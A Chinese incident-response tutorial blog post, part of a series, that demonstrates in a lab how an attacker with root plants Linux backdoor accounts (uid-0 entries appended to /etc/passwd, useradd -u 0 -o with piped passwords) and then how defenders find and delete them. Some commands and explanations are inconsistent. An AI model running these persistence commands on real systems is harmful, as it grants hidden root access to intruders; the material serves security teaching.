[ 应急响应进阶篇-2 ] Linux创建后门并进行应急处置-1：超级用户帐号后门

🍬 博主介绍

👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~
✨主攻领域：【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限，欢迎各位大佬指点，相互学习进步！

2.1 Linux后门应急-1：增加超级用户帐号

2.1.1 增加超级用户帐号后门介绍

2.1.1.1 超级用户账号简介

增加超级用户账号是一种常见的后门技术，通过创建高权限账户来保持对系统的长期控制。这种方法通常在攻击者获得系统root权限后执行，以便日后再次访问。

2.1.1.2 原理

增加超级用户账号的原理是通过修改系统文件如/etc/passwd或/etc/shadow，添加新的用户条目并赋予其root权限。这些新用户将具有与系统管理员相同的权限，从而能够绕过正常的安全验证。

2.1.1.3 实现步骤

首先，通过命令行工具如echo和passwd向/etc/passwd和/etc/shadow文件中添加新的用户记录。然后，设置该用户的密码。最后，通过SSH或其他远程登录方式使用新创建的超级用户账号进行登录。

2.1.1.4 防御措施

为防止此类攻击，应定期检查系统文件的完整性，监控异常登录行为，并限制sudo权限的使用。同时，采用多因素认证和日志审计等手段提高系统安全性。

2.2.2 超级用户帐号创建实战

2.2.2.1 前提条件

假设在攻击的过程中，我们通过利用各种getshell手段，不仅成功渗透进了目标服务器的防御体系，还进一步拿到了具有最高控制权限的root权限，这意味着我们已经能够完全掌控这台服务器，可以执行任何我们需要的操作。这时候我们需要进行权限维持，从而创建各种后门。

2.2.2.2 环境介绍

靶机： centos7
IP： 10.0.0.202
攻击机： kali
IP： 10.0.0.128
远程模拟获取到的权限

ssh root@10.0.0.202

2.2.2.3 情况一：可以交互且允许uid=0的用户远程登录

2.2.2.3.1 增加超级用户账号后门

echo "powershell:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号
passwd powershell #修改powershell的密码为PS@SP@12@
由于有复杂度的要求，我设的复杂了一点点

2.2.2.3.2 超级用户账号后门测试

远程登录powershell测试，ssh远程登录，输入密码，登录成功，而且是root权限

ssh powershell@10.0.0.202
whoami

2.2.2.4 情况二：可以交互且不允许uid=0的用户远程登录

2.2.2.4.1 设置靶机不允许uid=0的用户登录

Linux禁止root账户远程登录

1.修改配置文件

vi /etc/ssh/sshd_config
PermitRootLogin改成no 
直接在配置文件末尾添加 PermitRootLogin no  也是可行的

2.最后重启ssh服务

service sshd restart

3.配置成功
再次采用root权限用户进行登陆，登陆不成功。

2.2.2.4.2 增加超级用户账号后门

如果系统不允许 uid=0 的用户远程登录（因为root的uid=0），可以增加一个普通用户账号
这种情况是防止后续用户禁止root登录，我们的root权限账户丢失，而丢失目标系统的所有权限，可以提前创建一个普通用户账号。

echo "hanchan:x:1000:1000::/:/bin/sh" >> /etc/passwd  #增加普通用户账号
passwd hanchan  #修改hanchan的密码为PS@SP@12@

2.2.2.4.3 超级用户账号后门测试

远程登录hanchan测试，ssh远程登录，输入密码，登录成功，而且是hanchan普通用户权限。
这个时候登录root账户，即使输入正确的密码也是不能成功登录的（因为root的uid=0）

2.2.2.5 情况三：不交互无回显添加Linux密码

2.2.2.5.1 简单解释不交互无回显

不交互无回显添加Linux密码指的是一种自动化脚本或命令行工具的使用方法，它允许管理员在没有用户交互的情况下（即不需要手动输入密码），并且不在终端上显示（即无回显）的情况下设置或更改用户的密码。这种技术常用于自动化部署、批量管理系统账户或者在脚本中安全地处理密码。
简单来说：我创建用户不需要在交互页面中输入密码、确认密码

2.2.2.5.2 方案一

创建后门用户hanchan1

useradd hanchan -u 0 -o -g root -G root|| echo "123456" | passwd --stdin hanchan #创建账户hanchan、密码123456且为root权限这个命令分为两部分，由 || 连接
useradd: 这个命令用于创建一个新的用户账户。
hanchan: 这是新用户的用户名。
-u 0: 这个选项指定了用户的UID（用户标识符）。UID为0通常表示root用户。
-o: 这个选项允许覆盖系统默认设置，例如在UID为0的情况下仍然创建用户。
-g root: 这个选项将用户分配到root组。
-G root: 这个选项将用户添加到其他附加组，这里也是root组。
echo "123456": 输出密码123456。
|: 管道符号，将左边的输出作为右边命令的输入。
passwd --stdin hanchan: 使用标准输入来设置用户hanchan的密码。如果用户 hanchan 已经存在且你不知道当前密码，执行这个命令将会把 hanchan 的密码修改为 123456。这是因为 passwd --stdin 命令允许通过标准输入直接设置新密码，绕过了需要知道当前密码的限制。

如果想直接修改原有用户密码，直接执行就可以

创建新的用户得执行命令两次才可以

useradd hanchan1 -u 0 -o -g root -G root|| echo "123456" | passwd --stdin hanchan1 #创建账户hanchan、密码123456且为root权限
useradd hanchan1 -u 0 -o -g root -G root|| echo "123456" | passwd --stdin hanchan1 #创建账户hanchan、密码123456且为root权限

查看hanchan1用户权限
本想直接创建hanchan用户，哪曾想已经存在了，执行结果就是修改了他的密码，但他的用户权限是不变的。又创建了一个hanchan1的新用户。
查看新用户hanchan1权限为root权限

切换到hanchan1用户执行whoami

2.2.2.5.3 验证方案一

ssh登录hanchan1用户，登陆成功，说明我们创建的后门用户可用。

ssh hanchan1@10.0.0.202

2.2.2.5.4 方案二

创建后门用户hanchan2

useradd  hanchan2
echo "123456" | passwd --stdin hanchan2

查看hanchan2权限，权限较小

cat /etc/passwd

su hanchan2
whoami

2.2.2.5.5 验证方案二

ssh登录hanchan1用户，登陆成功，说明我们创建的后门用户可用。

ssh hanchan2@10.0.0.202

2.2.2.5.6 方案三

创建后门用户hanchan3

useradd -u 0 -o -g root -G root hanchan3 | echo -e "1han2chan\n1han2chan" | passwd hanchan3
useradd -u 0 -o -g root -G root hanchan3 | echo -e "1han2chan\n1han2chan" | passwd hanchan3useradd: 创建新用户的命令。
-u 0: 指定用户的 UID（用户标识符）为 0。UID 0 通常保留给超级用户（root）。
-o: 允许使用重复的 UID。默认情况下，如果指定的 UID 已经存在，useradd 会失败。加上 -o 选项后，即使 UID 已存在，也会继续执行。
-g root: 将用户的主要组设置为 root。
-G root: 将用户添加到 root 组中。
hanchan3: 要创建的用户名。
|：管道符号用于将前一个命令的输出作为下一个命令的输入。在这里，它的作用是将 useradd 命令的输出传递给 echo 命令。
echo: 打印文本到标准输出。
-e: 启用转义字符的解释。
"1han2chan\1han2chan": 要打印的字符串，其中 \n 表示换行符。因此，这个命令会输出两行相同的密码 1qazwsx2wsx。
passwd: 更改用户密码的命令。
hanchan3: 要更改密码的用户名。

也是得执行两次，并且对密码强度有要求

查看hanchan3权限，为root权限

cat /etc/passwd

su hanchan2
whoami

2.2.2.5.7 验证方案三

ssh登录hanchan1用户，登陆成功，说明我们创建的后门用户可用。

ssh hanchan2@10.0.0.202

2.2.3 非法超级用户帐号应急实战

2.2.3.1 找到后门用户

Linux下查看可以远程登录的账号信息

awk '/\$1|\$6/{print $1}' /etc/shadow

查看特权账户，那些账户有root权限

awk -F: '$3==0 {print$1}' /etc/passwd

之后与服务器管理员沟通，就可以确定黑客增加的用户账号了。
最终确认了powershell、hanchan、hanchan1、hanchan2、hanchan3五个后门用户，将其删除即可。

2.2.3.2 删除所有后门用户

删除相关文件的所有的行

vi /etc/passwd
vi /etc/shadow
vi /etc/group

删除归于后门用户的所有的文件及文件夹以及计划任务等等内容，后续还会详细讲到。

相关资源

[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-1：windows后门账户
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-2：计划任务后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-3：windows服务后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-4：启动项后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-5：Shift 粘贴键后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-6：windows轻松访问后门